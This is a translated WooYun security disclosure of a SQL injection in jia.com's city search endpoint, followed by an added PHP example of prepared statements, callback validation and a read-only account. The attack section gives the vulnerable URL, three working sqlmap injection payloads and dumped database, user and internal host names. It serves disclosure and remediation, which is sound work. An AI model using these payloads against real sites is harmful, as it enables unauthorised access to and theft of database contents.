
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-064387

Title: Qijia.com (齐家网): a DBA-level SQL injection

Vendor: www.jia.com

Author: 追逐天堂

Submitted: 2014-06-13 10:54

Fixed: 2014-06-18 10:55

Disclosed: 2014-06-18 10:55

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-06-13: details sent to the vendor, awaiting vendor handling
2014-06-18: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Since they run a website, they presumably won't ignore this..... Qijia.com is fairly large, after all.

Detailed description:

URL: http://www.jia.com/citylist/search.php?callback=?&search_name=1


(Screenshots 1.png, 2.png, 3.png and 4.png not reproduced in text)

Proof of vulnerability:

sqlmap identified the following injection points with a total of 274 HTTP(s) requests:
---
Place: GET
Parameter: search_name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=?&search_name=1' AND (SELECT 2336 FROM(SELECT COUNT(*),CONCAT(0x7166686d71,(SELECT (CASE WHEN (2336=2336) THEN 1 ELSE 0 END)),0x716e676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RpoS'='RpoS
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: callback=?&search_name=1' UNION ALL SELECT CONCAT(0x7166686d71,0x776a526d504b6852754c,0x716e676d71),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: callback=?&search_name=1' AND 7074=BENCHMARK(5000000,MD5(0x67754445)) AND 'XAiw'='XAiw
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
available databases [17]:
[*] _del_access_ip_count_20140609bak
[*] _del_xi1_20140609bak
[*] _del_xiuxiu.a_20140609bak
[*] _del_xiuxiu_cms_20140609bak
[*] _del_zhuangxiu.18.52_20140609bak
[*] _del_zsa_20140609bak
[*] _del_zx_20140609bak
[*] _del_zx_bak519_20140609bak
[*] _del_zx_public_20140609bak
[*] aabb
[*] ConfigDB
[*] diaoding
[*] information_schema
[*] mysql
[*] test
[*] xiuxiu
[*] zhuangxiu
current user is DBA: True
current database: 'zhuangxiu'
current user: 'zhuangxiudb@10.10.20.%'
Database: _del_zx_bak519_20140609bak
[85 tables]
Database: _del_zsa_20140609bak
[53 tables]
Database: zhuangxiu
[173 tables]
Database: xiuxiu
[120 tables]
Database: _del_zx_public_20140609bak
[3 tables]
+---------------------------------------+
| pub_micro_letters |
| pub_weibo |
| weibo_user |
+---------------------------------------+
Database: _del_zx_20140609bak
[15 tables]
Database: aabb
[293 tables]
Database: diaoding
[16 tables]
Database: _del_xi1_20140609bak
[75 tables]
Database: _del_xiuxiu_cms_20140609bak
[92 tables]
Database: _del_xiuxiu.a_20140609bak
[98 tables]
Database: ConfigDB
[3 tables]
+---------------------------------------+
| mysql_status |
| query_review |
| query_review_history |
+---------------------------------------+
Database: mysql
[23 tables]
Database: test
[3 tables]
+---------------------------------------+
| accesslog |
| checksums |
| dsns |
+---------------------------------------+
Database: _del_access_ip_count_20140609bak
[1 table]
+---------------------------------------+
| ip_count |
+---------------------------------------+
Database: information_schema
[28 tables]
Database: _del_zhuangxiu.18.52_20140609bak
[52 tables]

Fix recommendation:

You know better than I do.
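A hardened form of the reported endpoint, as an added example that is not jia.com's own source: a hypothetical citylist/search.php reading the same `search_name` and JSONP `callback` parameters, showing the string-splicing pattern that produces the sqlmap findings above beside a prepared-statement version, strict callback validation, and a read-only database account in place of the DBA user. The table and column names (`city`, `id`, `name`), the DB host and the account `citylist_ro` are assumptions; only the parameter names, the `zhuangxiu` database and the `10.10.20.%` host pattern come from the report.

```php
<?php
// Added example (not jia.com's code): hypothetical citylist/search.php that
// mirrors the reported endpoint and contrasts the injectable pattern with a
// hardened one. Written for PHP 5.3-era mysqli, matching the reported stack.

// --- Vulnerable pattern: how search_name becomes injectable ---------------
// Kept only to show the defect; never route requests through it.
function search_vulnerable(mysqli $db, $searchName)
{
    // The raw value is spliced into the SQL text. A single quote inside
    // search_name closes the literal, so the statement's structure is under
    // the caller's control; the UNION, error-based and BENCHMARK variants in
    // the sqlmap output all start from exactly this defect.
    $sql = "SELECT id, name FROM city WHERE name LIKE '%" . $searchName . "%'";
    $rows = array();
    if ($res = $db->query($sql)) {
        while ($row = $res->fetch_assoc()) {
            $rows[] = $row;
        }
        $res->free();
    }
    return $rows;
}

// --- Hardened version ------------------------------------------------------
function search_hardened(mysqli $db, $searchName)
{
    // Prepared statement: the value is sent separately from the SQL text, so
    // quotes or keywords inside it can never change the query's structure.
    // The LIKE wildcard is added server-side; '%', '_' and '\' typed by the
    // user are escaped so a name search cannot become a full-table scan.
    $pattern = '%' . addcslashes($searchName, '%_\\') . '%';
    $stmt = $db->prepare("SELECT id, name FROM city WHERE name LIKE ? LIMIT 50");
    if ($stmt === false) {
        return array();
    }
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $stmt->bind_result($id, $name);
    $rows = array();
    while ($stmt->fetch()) {
        $rows[] = array('id' => $id, 'name' => $name);
    }
    $stmt->close();
    return $rows;
}

// The JSONP callback is reflected into a script body, so accept only a plain
// (optionally dotted) JavaScript identifier of bounded length.
function valid_callback($cb)
{
    return is_string($cb)
        && strlen($cb) <= 64
        && preg_match('/^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$/', $cb) === 1;
}

// --- Request handling ------------------------------------------------------
$callback   = isset($_GET['callback']) ? $_GET['callback'] : '';
$searchName = isset($_GET['search_name']) ? (string) $_GET['search_name'] : '';

if (!valid_callback($callback) || strlen($searchName) > 50) {
    header('HTTP/1.1 400 Bad Request');
    exit;
}

// Least privilege for the finding "current user is DBA: True": connect as an
// account that can only SELECT from the one table this page needs, e.g.
//   GRANT SELECT ON zhuangxiu.city TO 'citylist_ro'@'10.10.20.%';
// Host, account name and password below are placeholders (assumptions).
$db = new mysqli('db.internal.example', 'citylist_ro', 'PLACEHOLDER_PASSWORD', 'zhuangxiu');
if ($db->connect_errno) {
    header('HTTP/1.1 503 Service Unavailable');
    exit;
}
$db->set_charset('utf8');

header('Content-Type: application/javascript; charset=utf-8');
header('X-Content-Type-Options: nosniff');
echo $callback . '(' . json_encode(search_hardened($db, $searchName)) . ');';
$db->close();
```

Even with the query parameterized, an injection elsewhere in the application would still expose every database listed above as long as the web account holds DBA rights, so the GRANT change matters independently of the code fix.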

Copyright notice: please credit the source when reposting: 追逐天堂@乌云


Vendor response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2014-06-18 10:55

Vendor reply:

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-06-11 09:25 | Lonely ( Intern white hat | Rank:72 Vulns:27 | Life is like a dream; one never swims past the sorrow of being too close to see clearly. )
  2. 2014-06-13 11:03 | ( Regular white hat | Rank:1207 Vulns:104 | Legend has it that 魇 is a remarkable man who astonishes the world, but apart from his ...)

    @Lonely This vendor does exist, doesn't it? How come it is still unclaimed..

  3. 2014-06-13 15:24 | 乐乐、 ( Regular white hat | Rank:853 Vulns:189 )

    One hundred percent they will ignore it

  4. 2014-06-13 22:26 | Lonely ( Intern white hat | Rank:72 Vulns:27 | Life is like a dream; one never swims past the sorrow of being too close to see clearly. )

    @魇 No idea; Qijia looks pretty decent, though.

  5. 2014-06-18 12:49 | 假马 ( Regular white hat | Rank:142 Vulns:18 | I exist, in your auntie's mind. )

    Tsk tsk tsk.

  6. 2015-08-17 15:33 | Shanghai Qijia Network Information Technology Co., Ltd. (WooYun vendor)

    Not an issue; this is a false positive.